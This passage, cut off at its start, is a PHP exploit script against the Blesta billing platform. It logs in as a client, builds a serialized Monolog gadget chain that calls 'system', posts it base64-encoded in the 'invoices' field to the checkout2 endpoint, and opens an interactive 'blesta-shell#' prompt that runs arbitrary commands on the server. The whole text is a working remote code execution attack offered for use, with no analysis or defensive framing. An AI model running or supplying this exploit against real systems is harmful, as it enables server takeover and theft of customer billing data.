\n"; print "\nExample....: php $argv[0] http://localhost/blesta/ egix password"; print "\nExample....: php $argv[0] https://www.blesta.com/ hacker pwned\n\n"; die(); } class Monolog_Handler_SyslogUdpHandler { protected $socket; function __construct($x) { $this->socket = $x; } } class Monolog_Handler_BufferHandler { protected $handler; protected $bufferSize = -1; protected $buffer; protected $level = null; protected $initialized = true; protected $bufferLimit = -1; protected $processors; function __construct($methods, $command) { $this->processors = $methods; $this->buffer = [$command]; $this->handler = $this; } } function exec_cmd($cmd) { global $ch, $url, $token; $cmd .= "; echo CMDDELIM"; $chain = new Monolog_Handler_SyslogUdpHandler(new Monolog_Handler_BufferHandler(['current', 'system'], [$cmd, 'level' => null])); $chain = base64_encode(str_replace('_', '\\', serialize($chain))); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["invoices" => $chain])); return curl_exec($ch); } $url = $argv[1]; $user = $argv[2]; $pwd = $argv[3]; $ch = curl_init(); @unlink("./cookies.txt"); curl_setopt($ch, CURLOPT_URL, "{$url}client/login/"); curl_setopt($ch, CURLOPT_COOKIEJAR, "./cookies.txt"); curl_setopt($ch, CURLOPT_COOKIEFILE, "./cookies.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); //curl_setopt($ch, CURLOPT_PROXY, 'http://127.0.0.1:8080'); print "\n[+] Performing client login with username '{$user}' and password '{$pwd}'\n"; if (!preg_match('/"_csrf_token" value="([^"]+)/i', curl_exec($ch), $token)) die("[-] CSRF token not found!\n\n"); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["_csrf_token" => $token[1], "username" => $user, "password" => $pwd])); if (preg_match('/alert-danger/i', curl_exec($ch))) die("[-] Login failed!\n\n"); print "[+] Launching shell\n"; curl_setopt($ch, CURLOPT_URL, "{$url}client_pay/received/checkout2"); while(1) { print "\nblesta-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; preg_match('/(.*)CMDDELIM/s', exec_cmd($cmd), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n"); }